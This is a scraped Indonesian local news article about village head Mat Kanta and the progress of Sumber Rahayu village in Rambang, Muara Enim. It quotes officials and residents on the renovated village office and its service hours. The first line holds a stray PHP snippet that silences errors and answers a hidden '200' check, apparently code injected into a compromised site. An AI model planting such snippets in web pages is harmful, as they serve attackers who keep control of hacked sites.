error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Tangan Dingin MAT KANTA S.Sos, Desa Sumber Rahayu Maju Pesat - SMI.COM

Home / PRABUMULIH

Jumat, 11 Juni 2021 - 15:25 WIB

Tangan Dingin MAT KANTA S.Sos, Desa Sumber Rahayu Maju Pesat

Prabumulih,SMI

Di bawah kepemimpinan kepala desa sumber rahayu MAT KANTA S.Sos pemerintahan maju pesat, bahkan Desa Sumber Rahayu Rambang terus berbenah diri, membangun desa sumber rahayu kecamatan Rambang kabupaten Muara enim provinsi Sumatera Selatan.


Jika melihat keadaan Dahulu desa tersebut merupakan daerah Transmigrasi, Namun seiring berjalannya waktu, desa sumber rahayu kecamatan Rambang, kini bisa setara dengan desa-desa lain di kecamatan Rambang, Kabupaten Muara Enim Provinsi Sumatera Selatan.

Di era kepemimpinan Mat kanta S.Sos, kantor desa Sumber Rahayu ini sudah terbilang maksimal dan walaupun dalam perjalanan di warnai pro & kontra.

Namun demi kemajuan masyarakat desa sumber rahayu, Mat Kanta S.Sos bersama unsur pemerintahan desa sumber rahayu, BPD,kadus,RT, pengusaha, tokoh agama, tokoh adat dan seluruh warga desa sumber rahayu secara bersama membangun desa tersebut.

Mat kanta S.Sos menceritakan sekelumit tentang kemajuan desaini. Terutama tentang gedung kan desa sumber rahayu.”kenapa kami menata kantor desa sumber rahayu seperti ini ?….ini semua agar kami dapat meningkatkan pelayanan yang maksimal, terhadap masyarakat dengan cepat dan prima. Serta tentunya akan membuat rasa nyaman,Baik bagi perangkat desa dalam melaksanakan tugas, mau pun pada masyarakat yang datang kesini”.

Baca Juga :  Tilang E-TLE dan Aplikasi Smart City Dulur Kito Segera Berlaku di Prabumulih

Lebih lanjut kepala desa sumber rahayu ini menjelaskan : ” kami melayani masyarakat setiap hari kerja , yaitu pada hari senin sampai. Kamis ,dari pukul 08.00-16.00 wib . Jam istirahat kerja pukul 12.00-13.00 wib.sedangkan hari jum’at pukul 07.30-11.30 wib masuk kembali pukul 13.30-16.30 wib.Hari sabtu dan minggu libur kantor, namun pelayanan tetap ada pengecualian, ketika ada masyarakat yang sifatnya sangat mendesak tetap ada pelayanan.seperti ada orang sakit ,ada keributan dan lain sebagainya.

Adapun tujuannya agar dapat memberikan contoh kepada pemerintahan desa sumber rahayu, kedepannya nanti setelah habis Periode saya nanti”,ujar sang kepala desa Sumber Rahayu ini.

Mengakhiri perbincancangan ini , beliau menambahkan:” ini semua bukanlah kemampuan saya sendiri, Kalau saya pribadi bukanlah apa-apa , namun ini terjadi karena doa semua pihak. Serta kekompakan dari seluruh perangkat desa dan stafnya.

Baca Juga :  Ketua PWI kota Prabumulih Apresiasi Pengungkapan Kasus Pembunuhan Marsal

Sementara itu di ruangan tengah kantor desa sumber rahayu ini.awak media membincangi ketua BPD desa sumber rahayu Dedy sopran, Beliau menuturkan”,semogah di tahun berikutnya. Dibawah kepemimpinan Mat Kanta S.Sos , semakin banyak kemajuan, Bukan hanya di kantor desa ini, tapi kemajuan di semua bidang, Terutama untuk kesejahteraan masyarakat desa Sumber Rahayu ini “.tandas ketua BPD sumber rahayu.

Salah seorang tokoh masyarakat desa sumber rahayu H.Khairul Saleh , yang kebetulan ada diruangan tersebut mengutarakan”aiii men lok ini kantor desa ni , hase ade di kantor banklah nyaman nian hasenye. Rugi nian men perangkat desa , men deg endak khajin begawi. Sempat hasenye , lum lame nian kami dudok ditengahi kupi pule, Sumber rahayu benae-benae berubah, semenjak di pimpinl leh Mat kanta ini”, tandas pak haji ini.Semogah kedepannya pembangunan desa sumber rahayu semakin maju.( Sunar )

Share :

Baca Juga

PRABUMULIH

AKBP.Witdiardi.SIk.MH Kapolres Prabumulih Berikan Bantuan Kepada Suharmi Korban Kebakaran Rumah di Prabumulih

PRABUMULIH

Heboh, Wanita Lansia Di Temukan Tak Bernyawa, TSK di Kejar

PRABUMULIH

Kejadian Kebakaran Di Kota Prabumulih Akan Menurun, Jika Kita Bersama Mencegahnya

PRABUMULIH

Ngobrol Pintar Bersama BEM STEI FURQON PRABUMULIH Dengan ABI SAMRAN.SH.CTA

PRABUMULIH

H.Ir.Ridho Yahya.MM Menghadiri Tasyakuran Dan Doa Bersama Penempatan Gedung Baru Pengadilan Agama Kota Prabumulih

ADVETORIAL

Walikota Prabumulih & DPRD Kota Prabumulih Adakan Raperda Kota Prabumulih Tahun 2022

PRABUMULIH

DPC Partai Demokrat Kota Prabumulih Over-Target BACALEG Tahun 2024-2029

PRABUMULIH

DPC Partai Demokrat Kota Prabumulih Berikan Bantuan Pada Suharmi